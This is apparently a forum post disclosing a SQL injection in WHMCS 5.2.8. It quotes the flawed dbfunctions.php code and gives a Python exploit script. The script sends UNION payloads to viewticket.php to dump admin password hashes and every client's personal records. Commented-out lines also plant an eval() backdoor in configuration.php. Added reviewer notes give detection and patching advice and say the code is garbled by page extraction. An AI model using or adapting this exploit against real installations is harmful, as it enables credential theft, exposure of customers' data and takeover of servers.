WHMCS 5.2.8 Vulnerability

Here we go again: Po0r WHMCS's new version got exploited again! THIS TIME IT'S again the same mistake in /includes/dbfunctions.php: WE Can manipulate the GET/POST variables and end up with something like $value = array('sqltype' => 'TABLEJOIN', 'value' => '[SQLI]'); for the '>', '<', '<=', '>=' and 'TABLEJOIN' cases that value is concatenated into the WHERE clause without surrounding quotes, so the quote-escaping done by db_escape_string() gives no protection there (and the '<=' / '>=' branches even use the raw $origkey instead of the sanitised $key). FROM THIS VULNERABILITY WE CAN EVEN change /configuration.php to whatever we want (PHP code included) [php] $value) { $key = db_make_safe_field($origkey); if (is_array($value)) { if ($key == 'default') { $key = '`default`'; } if ($value['sqltype'] == 'LIKE') { $criteria[] = $key . ' LIKE \'%' . db_escape_string($value['value']) . '%\''; continue; } if ($value['sqltype'] == 'NEQ') { $criteria[] = $key . '!=\'' . db_escape_string($value['value']) . '\''; continue; } if ($value['sqltype'] == '>') { $criteria[] = $key . '>' . db_escape_string($value['value']); continue; } if ($value['sqltype'] == '<') { $criteria[] = $key . '<' . db_escape_string($value['value']); continue; } if ($value['sqltype'] == '<=') { $criteria[] = $origkey . '<=' . db_escape_string($value['value']); continue; } if ($value['sqltype'] == '>=') { $criteria[] = $origkey . '>=' . db_escape_string($value['value']); continue; } if ($value['sqltype'] == 'TABLEJOIN') { $criteria[] = $key . '=' . db_escape_string($value['value']); continue; } if ($value['sqltype'] == 'IN') { $criteria[] = $key . ' IN (\'' . implode('\',\'', db_escape_array($value['values'])) . '\')'; continue; } continue; } [...] ?>[/php] SO Re-edit Your Previous WHMCS.py exploit script and ENJOY! 
# NOTE(review): proof-of-concept kept byte-for-byte as posted. It is Python 2 code
# (print statement, urllib2), the page extraction collapsed it onto a few lines so the
# inline '#' comments now swallow the statements that follow them, and the re.search()
# pattern below lost its delimiters when the page was rendered -- it does not run as shown.
# What it exercises: WHMCS <=5.2.8 builds WHERE criteria from request values shaped as
# param[sqltype]=TABLEJOIN&param[value]=... and concatenates the value unquoted (see the
# dbfunctions.php excerpt above), so db_escape_string() offers no protection; exploit()
# posts such a parameter to viewticket.php and reads the UNION result back out of the page.
# Detection: a request whose parameter names carry a "[sqltype]" suffix is a high-fidelity
# indicator of this attack against a WHMCS install, and the "union select" payload and the
# viewticket.php path are both visible in ordinary web-server logs.
# Mitigation: update WHMCS past 5.2.8 / apply the vendor fix; until then block "[sqltype]"
# parameters at the edge.
Exp: [php] #!/usr/bin/env python # 2013/10/18 - WHMCS <=5.2.8 SQL Injection # [url]http://localhost.re/p/whmcs-528-vulnerability[/url] url = 'http://client.target.com/' import urllib, re, sys from urllib2 import Request, urlopen ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" def exploit(sql): sqlUnion = '-1 union select 1,0,0,0,0,0,0,0,0,0,0,%s,0,0,0,0,0,0,0,0,0,0,0#' % sql print "Doing stuff: %s" % sqlUnion #you could exploit any file that does a select, I randomly chose viewticket.php r = urlopen(Request('%sviewticket.php' % url, data="tid[sqltype]=TABLEJOIN&tid[value]=%s" % sqlUnion, headers={"User-agent": ua})).read() return re.search(r'
(.*?)
', r, re.DOTALL).group(1).strip() #get admins print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)') #get users count = int(exploit('(SELECT COUNT(id) FROM tblclients)')) print "User count %d" % count for i in range(count): print exploit('(SELECT CONCAT(id,0x3a,firstname,0x3a,lastname,0x3a,address1,0x3a,address2,0x3a,city,0x3a,country,0x3a,ip,0x3a,email,0x3a,password) FROM tblclients LIMIT %d,1)' % i) #are you evil? yes, you are! #php = "1';eval($_REQUEST['lol_whmcs']);#" #r = urlopen(Request('%sadmin/licenseerror.php?updatekey=true&whitelisted=1&newlicensekey=%s&match=1&username[sqltype]=TABLEJOIN&username[value]=-1||1=1%%23' % (url, urllib.quote_plus(php)), headers={"User-agent": ua})).read()[/php]
# NOTE(review): the two commented-out lines at the end are presumably the configuration.php
# write path the post refers to (admin/licenseerror.php called with updatekey=true and a
# username[sqltype]=TABLEJOIN parameter) -- TODO confirm against the affected source. For
# incident response, treat a modified configuration.php, or any licenseerror.php request that
# combines updatekey=true with a "[sqltype]" parameter, as an indicator of compromise and
# review admin/client credential exposure (tbladmins / tblclients are the tables read above).
